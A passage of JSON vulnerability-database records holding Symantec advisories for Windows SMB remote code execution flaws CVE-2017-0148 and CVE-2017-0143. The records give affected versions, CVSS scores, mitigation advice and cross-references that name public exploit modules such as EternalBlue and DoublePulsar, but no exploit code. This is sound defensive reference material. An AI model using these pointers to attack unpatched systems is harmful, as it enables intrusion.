Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96706", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0148"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0148"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 9.0}}, "hash": "90b50f664337a8b0d10d7782e03c5593d65f99771e7eba53e441a55495fc47f9", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96706", "id": "SMNTC-96706", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 25}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T14:30:45", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T14:30:45", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "a1c574707536007228601a6892ce381406ff4b4a1f4f64dc4bfe2402115c6bd1", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "7d544338a938ae7978c04bbbfd191f84", "key": "href"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "74af08e9aed061e2c0200c647772ba4c", "key": "title"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96706", "id": "SMNTC-96706", "immutableFields": [], "lastseen": "2018-03-13T14:30:45", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 63}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T14:30:45"}], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "b99edf73073813cd4c0252d2eb2a41b1"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "7d544338a938ae7978c04bbbfd191f84"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "74af08e9aed061e2c0200c647772ba4c"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96703", "hash": "98cd715cd7987a52fdc7c0328cfd081f237800ebc4a0aa74fec49e8b02aac56c", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96703", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0143"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 8.5}}, "hash": "cafd9923742e45a31e28d1be64997bfa0c179ce159f3ad8f05f219ee06a1f196", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96703", "id": "SMNTC-96703", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 29}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": 